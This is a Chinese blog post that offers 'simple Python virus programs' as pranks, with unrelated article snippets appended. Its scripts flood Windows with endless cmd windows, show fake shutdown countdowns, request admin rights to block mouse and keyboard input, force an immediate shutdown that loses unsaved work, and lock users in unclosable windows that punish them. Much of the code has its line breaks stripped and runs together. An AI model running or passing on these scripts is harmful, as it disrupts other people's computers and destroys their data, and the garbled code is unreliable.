Python-简单病毒程序合集(一)

前言:简单又有趣的Python恶搞代码,往往能给我们枯燥无味的生活带来一点乐趣,激发我们对编程的最原始的热爱。那么话不多说,我们直接开始今天的编程之路。

编程思路:本次我们将会用到os,paltform,threading,ctypes,sys,wmi等库

一:无限弹窗

import oswhile True:os.system('start cmd')

程序解释:这段代码将执行os库无限打开"cmd"窗口的命令,导致电脑CPU负载过大,电脑风扇直接起飞,系统出现严重卡顿。

运行效果:

fde9565cba41442799cf283caa2ed4b4.jpg

 

 

二:伪关机倒计时

import tkinter
import os
import threading
import time
import random
import platforms=['red','orange','yellow','green','blue','teal','purple','peru','gold','violet','salmon','navy','tan','maroon','azure']begin=12
def count_down():seconds=[]for i in range(begin,0,-1):seconds.append(i)return secondsdef windows():while len(count_down())>0:window = tkinter.Tk()window.title('{} {} {} {}警告!!!'.format(os.name,platform.machine(),platform.node(),platform.version()))window.geometry("{}x{}".format(1160,600))number=random.randint(0,14)tkinter.Label(window,text='{}系统将在{}秒后自动关机'.format(platform.system(),count_down()[0])*1,font=('楷体',30),bg='{}'.format(s[number]),width=1160,height=600).pack()window.mainloop()count_down().remove(count_down()[0])while begin>0:mark=threading.Thread(target=windows)mark.start()time.sleep(1)begin-=1

程序解释:程序运行后将会出现12->0的倒计时弹窗,且弹窗颜色会随机在15种颜色内变化。弹窗中央会提示系统将在X秒后将关机(但其实并不会真的关机)

运行效果:

73d5b3ced686432ca8a574e2dedc4cce.jpg

 

三:伪关机倒计时(进阶版)

import sys
import ctypes
import tkinter
import os
import threading
import time
import random
import platformdef is_admin():try:return ctypes.windll.shell32.IsUserAnAdmin()except:return Falseif is_admin():user32 = ctypes.WinDLL('user32.dll')user32.BlockInput(True)begin = 12s = ['red', 'orange', 'yellow', 'green', 'blue','teal', 'purple', 'peru', 'gold', 'violet','salmon', 'navy', 'tan', 'maroon', 'azure']def count_down():seconds = []for i in range(begin, 0, -1):seconds.append(i)return secondsdef windows():window = tkinter.Tk()window.title('{} {} {} {}警告!!!'.format(os.name,platform.machine(),platform.node(),platform.version()))window.geometry("{}x{}".format(1160, 600))number = random.randint(0, 14)tkinter.Label(window,text='{}系统将在{}秒后自动关机'.format(platform.system(), count_down()[0]) * 1,font=('楷体', 30),bg='{}'.format(s[number]),width=1160,height=600).pack()window.mainloop()count_down().remove(count_down()[0])while begin > 0:mark = threading.Thread(target=windows)mark.start()time.sleep(1)begin -= 1time.sleep(0)user32.BlockInput(False)else:ctypes.windll.shell32.ShellExecuteW(None,"runas", sys.executable, __file__, None, 1)

程序解释:程序运行之后将会让用户选择是否允许系统修改用户设备,如果用户点击“是”,则程序会像上面代码一样:出现12→0倒计时弹窗,且弹窗颜色会随机在15种颜色内变化。弹窗中央会提示系统将在X秒后将关机(但其实并不会真的关机),最重要的是,系统还会禁止用户的一切物理操作(包括内,外接鼠标和键盘,但不包括触摸板),即鼠标键盘失效;如果用户点击“否”,则程序自动跳过。

运行效果:

fb7dc71f28994dc3bdcfc5243a0be145.jpg

 3ed7cc9b6db543088e34f6f675c5a926.png

 

四:强制关机时钟炸弹

import sys
import ctypes
import tkinter
import os
import threading
import time
import random
import platformdef is_admin():try:return ctypes.windll.shell32.IsUserAnAdmin()except:return Falseif is_admin():user32 = ctypes.WinDLL('user32.dll')user32.BlockInput(True)begin = 12s = ['red', 'orange', 'yellow', 'green', 'blue','teal', 'purple', 'peru', 'gold', 'violet','salmon', 'navy', 'tan', 'maroon', 'azure']def count_down():seconds = []for i in range(begin, 0, -1):seconds.append(i)return secondsdef windows():window = tkinter.Tk()window.title('{} {} {} {}警告!!!'.format(os.name,platform.machine(),platform.node(),platform.version()))window.geometry("{}x{}".format(1160, 600))number = random.randint(0, 14)tkinter.Label(window,text='{}系统将在{}秒后自动关机'.format(platform.system(), count_down()[0]) * 1,font=('楷体', 30),bg='{}'.format(s[number]),width=1160,height=600).pack()window.mainloop()count_down().remove(count_down()[0])while begin > 0:mark = threading.Thread(target=windows)mark.start()time.sleep(1)begin -= 1time.sleep(0)user32.BlockInput(False)os.system('shutdown -f -s -t 0')else:ctypes.windll.shell32.ShellExecuteW(None,"runas", sys.executable, __file__, None, 1)

程序解释:程序运行之后,就像“ 三:伪关机倒计时(进阶版) ”一样,但是这次倒计时结束后程序会真的执行关机执令(而且是强制关机),这意味着用户的临时文件和临时数据都会丢失

运行效果:

8b2c58131de04ab28ed3291f0d271f24.jpg

997b4bce31f84694b5c1ee5e26ce9891.png

987db65d67a04b408ecfac92a5e5c55c.jpg

 

五:验证入口枷锁(Boss)

from tkinter import *
from tkinter import ttk
import platform
import os
import time
import wmi
import random
import sys
import ctypes
import threadingdef is_admin():try:return ctypes.windll.shell32.IsUserAnAdmin()except:return Falseif is_admin():# 验证失败处罚模块def punish_os():while True:os.system('start cmd')def punish_time():user32 = ctypes.WinDLL('user32.dll')user32.BlockInput(True)begin = 12s = ['red', 'orange', 'yellow', 'green', 'blue','teal', 'purple', 'peru', 'gold', 'violet','salmon', 'navy', 'tan', 'maroon', 'azure']def count_down():seconds = []for i in range(begin, 0, -1):seconds.append(i)return secondsdef windows():window = Tk()window.title('{} {} {} {}警告!!!'.format(os.name,platform.machine(),platform.node(),platform.version()))window.geometry("{}x{}".format(1160, 600))number = random.randint(0, 14)Label(window,text='{}系统将在{}秒后自动关机'.format(platform.system(), count_down()[0]) * 1,font=('楷体', 30),bg='{}'.format(s[number]),width=1160,height=600).pack()window.mainloop()count_down().remove(count_down()[0])while begin > 0:mark = threading.Thread(target=windows)mark.start()time.sleep(1)begin -= 1time.sleep(0)user32.BlockInput(False)os.system('shutdown -f -s -t 0')# 入口访问信息校对模块def proofread():s = []x = os.environ.get('USERNAME')y = platform.machine()s.append(x)w = wmi.WMI()for CS in w.Win32_ComputerSystem():s.append(CS.Manufacturer)s.append(y)return s# 验证入口模块w = Tk()screen_width = w.winfo_screenwidth()screen_height = w.winfo_screenheight()width = 600height = 350x = int((screen_width - width) / 2)y = int((screen_height - height) / 2)w.geometry('{}x{}+{}+{}'.format(width, height,x, y))w.resizable(False, False)w.protocol("WM_DELETE_WINDOW", lambda: None)w.title('系统类型:{} 主机名:{} 系统版本号:{} 计算机类型:{}'.format(platform.system(), platform.node(),platform.version(), platform.machine()))style = ttk.Style()style.configure('TButton', font=28, relief='sunken', fg='gold', bg='blue')def close_root():w.destroy()Label(w, text='你已授权本程序以管理员权限',font=60, bg='white', ).pack(pady=20, fill='x')button1 = Button(text="用户身份验证入口按钮",command=close_root, cursor='hand2').pack(pady=96, padx=80, side='left')button2 = Button(text="默认身份验证失败按钮",command=punish_os, cursor='hand2').pack(pady=98, padx=80, side='left')w.configure(bg='blue')w.iconbitmap('info')w.mainloop()# 加载模块win = Tk()screen_width = win.winfo_screenwidth()screen_height = win.winfo_screenheight()width = 600height = 350x = int((screen_width - width) / 2)y = int((screen_height - height) / 2)win.geometry('{}x{}+{}+{}'.format(width, height,x, y))win.title('正在进入用户验证界面,请耐心等待!')win.protocol("WM_DELETE_WINDOW", lambda: None)win.resizable(False,False)win.iconbitmap('warning')percent = StringVar()percent_label = Label(win, textvariable=percent, bg='white', font=('Arial', 20))percent_label.pack(fill='x', pady=40)progress = ttk.Progressbar(win, mode='determinate', orient='horizontal', length=370)progress.pack(pady=40)def start():progress.start()def stop():progress.stop()button3 = Button(win, text='Start(继续)',cursor='hand2', command=start).pack(side='left', padx=116)button4 = Button(win, text='Stop(暂停)',cursor='hand2', command=stop).pack(side='left', padx=110)def do_work():total = 48for i in range(total):progress.step(100 / total)percent.set('{:.0f}%'.format(progress['value']))win.update_idletasks()time.sleep(0.5)def close_win():win.destroy()do_work()close_win()win.mainloop()# 验证主体模块win = Tk()screen_width = win.winfo_screenwidth()screen_height = win.winfo_screenheight()width = 600height = 350x = int((screen_width - width) / 2)y = int((screen_height - height) / 2)win.geometry('{}x{}+{}+{}'.format(width, height,x, y))win.title('你有10分钟的时间输入相关验证信息,完成后先点击"核对完成"再点击"确认提交"!!!')win.iconbitmap('error')win.configure(bg='violet', cursor='hand2')win.resizable(False, False)def close_win():win.destroy()var_1 = StringVar()var_2 = StringVar()var_3 = StringVar()# 创建第一个标签和Entrylabel1 = Label(win, text="本机用户名")label1.pack(padx=80, pady=5)entry1 = Entry(win, textvariable=var_1)entry1.pack(padx=80, pady=5)# 创建第一个清除按钮def clear_entry1():entry1.delete(0, END)clear_button1 = Button(win, text="清除键1", command=clear_entry1)clear_button1.pack(padx=80, pady=10)# 创建第二个标签和Entrylabel2 = Label(win, text="本机生产商")label2.pack(padx=80, pady=5)entry2 = Entry(win, textvariable=var_2)entry2.pack(padx=80, pady=5)# 创建第二个清除按钮def clear_entry2():entry2.delete(0, END)clear_button2 = Button(win, text="清除键2", command=clear_entry2)clear_button2.pack(padx=80, pady=10)# 创建第三个标签和Entrylabel3 = Label(win, text="计算机类型")label3.pack(padx=80, pady=0)entry3 = Entry(win, textvariable=var_3)entry3.pack(padx=80, pady=0)# 创建第三个清除按钮def clear_entry3():entry3.delete(0, END)clear_button3 = Button(win, text="清除键3", command=clear_entry3)clear_button3.pack(padx=80, pady=10)def get_info():x = var_1.get()y = var_2.get()z = var_3.get()s = [x, y, z]return sstart_time = time.time()Button(win, text='核对完成', command=get_info).pack(padx=120, pady=0, side='left')Button(win, text='确认提交', command=close_win).pack(padx=120, pady=0, side='left')win.mainloop()end_time = time.time()if get_info()[0:3] == proofread() and end_time - start_time <= 600:passelse:punish_time()else:ctypes.windll.shell32.ShellExecuteW(None,"runas", sys.executable, __file__, None, 1)

程序解释:程序运行之后,首先会同上面一样,让用户选择是否允许系统修改用户设备,如果用户点击“是”,那么程序会先弹出来一个界面:让用户选择“用户验证入口”,还是“默认验证失败”。如果用户点击“默认验证失败按钮”,那么系统会执行惩罚:无限弹窗(同一);如果用户点击“用户验证入口按钮”,该窗口关闭,新窗口打开。程序进入加载验证模块阶段,界面上会显示加载进度,用户可选择“Stop(暂停)”或“Start(继续)”来控制进度条进度,进度条满100%后,该窗口关闭,新窗口打开。你以为这就完了,其实这两个窗口是无法关闭的,用户必须作出选择。进入第三个窗口,程序会让用户按照窗口标题提示填写相关信息(只给600秒时间),填写完毕后,程序计算所用时间并校对信息,两者都符合规定则程序跳过,否则程序执行惩罚:“ 四:强制关机时钟炸弹”。

运行效果:

8647b13fc6ce4ba99774085f05aaf541.jpg

340baf8ef75e404fafa8947f46e13d29.png

e81d44a35fd34d6f9cf8f276a6011ae5.png

2ed0a4fffe4f45a7a22fe03984a53a71.png

验证通过(如下所示):

ff7b14e4d5d0449bb08a0ff70598d236.png

验证失败(如下所示):

aefc10e5b9cb478e942271189b62047c.png

a996f634a5404effaa6f8d64b94331db.jpg

OK!今天的分享到此结束啦!

下期我会优化本章代码,并带来新程序哦。

期待你的教流指教,我是闪云-微星,我们下期不见不散!

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/474285.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Web3浪潮下的区块链应用:从理论到实践的全面解析

随着Web3的兴起&#xff0c;区块链技术作为其核心支撑&#xff0c;正迎来前所未有的应用爆发。Web3不仅仅是技术的革新&#xff0c;更代表了一种去中心化、开放、透明的互联网愿景。在这一背景下&#xff0c;区块链技术的应用正从理论走向实践&#xff0c;推动着各行各业的数字…

网络安全:我们的安全防线

在数字化时代&#xff0c;网络安全已成为国家安全、经济发展和社会稳定的重要组成部分。网络安全不仅仅是技术问题&#xff0c;更是一个涉及政治、经济、文化、社会等多个层面的综合性问题。从宏观到微观&#xff0c;网络安全的重要性不言而喻。 宏观层面&#xff1a;国家安全与…

鸿蒙北向开发环境安装指南

境界一&#xff1a;昨夜西风凋碧树。独上高楼&#xff0c;望尽天涯路。----------王静安《人间词话》 单元一&#xff1a;鸿蒙开发工具的安装 学习目标 &#xff08;1&#xff09;完成鸿蒙开发工具Deveco Studio的安装。 任务1.1 下载DevEcoStudio 任务描述 DevEco Studi…

51单片机基础01 单片机最小系统

目录 一、什么是51单片机 二、51单片机的引脚介绍 1、VCC GND 2、XTAL1 2 3、RST 4、EA 5、PSEN 6、ALE 7、RXD、TXD 8、INT0、INT1 9、T0、T1 10、MOSI、MISO、SCK 11、WR、RD 12、通用IO P0 13、通用IO P1 14、通用IO P2 三、51单片机的最小系统 1、供电与…

golang开源框架:go开源验证框架validator

validator 单个字段格式验证 先来一个单个字段格式的验证 目录结构 在main函数中 package mainimport "awesomeProject/validate"func main() {validate.SingleFieldValidate() }在validator.go中 package validateimport ("github.com/go-playground/val…

计算机网络-MSTP基础实验一(单域多实例)

前面我们已经大致了解了MSTP的基本概念和工作原理&#xff0c;但是我自己也觉得MSTP的理论很复杂不结合实验是很难搞懂的&#xff0c;今天来做一个配套的小实验以及一些配置命令。 一、网络拓扑 单域多实例拓扑 基本需求&#xff1a;SW1为VLAN10的网关&#xff0c;SW2为VLAN20的…

智谱AI清影升级:引领AI视频进入音效新时代

前几天智谱推出了新清影,该版本支持4k、60帧超高清画质、任意尺寸&#xff0c;并且自带音效的10秒视频,让ai生视频告别了"哑巴时代"。 智谱AI视频腾空出世&#xff0c;可灵遭遇强劲挑战&#xff01;究竟谁是行业翘楚&#xff1f;(附测评案例)之前智谱出世那时体验了一…

商业物联网详细指南:优势与挑战

物联网是信息技术行业最具前景的领域之一。为什么它如此热门呢&#xff1f;原因在于全球连接性。设备可以像人群一样相互协作。正如我们所知&#xff0c;协作能显著提高生产力。 物联网对普通用户和企业都有益处。许多日常流程可以通过传感器、扫描仪、摄像头和其他设备实现自…

css uniapp背景图宽度固定高度自适应可以重复

page {height: 100%;background-image: url(https://onlinekc.a.hlidc.cn/uploads/20241115/350f94aaf493d05625a7ddbc86c7804e.png);background-repeat: repeat;background-size: contain;} 如果不要重复 把background-repeat: repeat;替换background-repeat: no-repeat;

学习日志012--python中多进程,多线程

简简单单小练习 1.线程的并发执行 import threading import time# 创建要执行的两个函数 def print_hello():for _ in range(10):print("hello")time.sleep(1)def print_world():for _ in range(10):print("world")time.sleep(1)# 创建线程对象 注意这里…

网络传输:网卡、IP、网关、子网掩码、MAC、ARP、路由器、NAT、交换机

目录 网卡IP网络地址主机地址子网子网掩码网关默认网关 MACARPARP抓包分析 路由器NATNAPT 交换机 网卡 网卡(Network Interface Card&#xff0c;简称NIC)&#xff0c;也称网络适配器。 OSI模型&#xff1a; 1、网卡工作在OSI模型的最后两层&#xff0c;物理层和数据链路层。物…

Ubuntu 22.04 上快速搭建 Samba 文件共享服务器

Samba 简介 Samba 是一个开源软件&#xff0c;它扮演着不同操作系统间沟通的桥梁。通过实现 SMB&#xff08;Server Message Block&#xff09;协议&#xff0c;Samba 让文件和打印服务在 Windows、Linux 和 macOS 之间自由流动。 以下是 Samba 的特点&#xff1a; 跨平台兼…

stm32启动过程解析startup启动文件

1.STM32的启动过程模式 1.1 根据boot引脚决定三种启动模式 复位后&#xff0c;在 SYSCLK 的第四个上升沿锁存 BOOT 引脚的值。BOOT0 为专用引脚&#xff0c;而 BOOT1 则与 GPIO 引脚共用。一旦完成对 BOOT1 的采样&#xff0c;相应 GPIO 引脚即进入空闲状态&#xff0c;可用于…

CVE-2024-2961漏洞的简单学习

简单介绍 PHP利用glibc iconv()中的一个缓冲区溢出漏洞&#xff0c;实现将文件读取提升为任意命令执行漏洞 在php读取文件的时候可以使用 php://filter伪协议利用 iconv 函数, 从而可以利用该漏洞进行 RCE 漏洞的利用场景 PHP的所有标准文件读取操作都受到了影响&#xff1…

视觉SLAM相机——单目相机、双目相机、深度相机

一、单目相机 只使用一个摄像头进行SLAM的做法称为单目SLAM&#xff0c;这种传感器的结构特别简单&#xff0c;成本特别低&#xff0c;单目相机的数据&#xff1a;照片。照片本质上是拍摄某个场景在相机的成像平面上留下的一个投影。它以二维的形式记录了三维的世界。这个过程中…

Java通过calcite实时读取kafka中的数据

引入maven依赖 <dependency> <groupId>org.apache.calcite</groupId> <artifactId>calcite-kafka</artifactId> <version>1.28.0</version> </dependency> 测试代码 import java.sql.Connection; import java.sql.DriverMan…

【时间之外】IT人求职和创业应知【36】-肖申克的救赎

目录 新闻一&#xff1a;信息技术应用创新产业大会在深圳开幕 新闻二&#xff1a;人工智能与大数据融合应用成为创业新热点 新闻三&#xff1a;云计算与边缘计算协同发展推动IT行业创新 认知和思考决定了你的赚钱能力。以下是今天可能引起你思考的热点新闻&#xff1a; 新闻…

python高级之简单爬虫实现

一、前言 场景1&#xff1a;一个网络爬虫&#xff0c;顺序爬取一个网页花了一个小时&#xff0c;采用并发下载就减少到了20分钟。 场景2&#xff1a;一个应用软件优化前每次打开网页需要3秒&#xff0c;采用异步并发提升到了200毫秒。 假设一个工程的工作量为100&#xff0c…

01_MinIO部署(Windows单节点部署/Docker化部署)

单节点-Windows环境安装部署 在Windows环境安装MinIO&#xff0c;主要包含两个东西&#xff1a; MinIO Server&#xff08;minio.exe&#xff09;&#xff1a;应用服务本身MinIO Client&#xff08;mc.exe&#xff09;&#xff1a;MinIO客户端工具&#xff08;mc&#xff09;…

数据分析24.11.13

Excel 函数 求和 函数 sum() sumif() SUMIF(range, criteria, [sum_range]) sumifs() average() count() max() min() 逻辑 函数 if() iferror() 查询函数 VLOOKUP()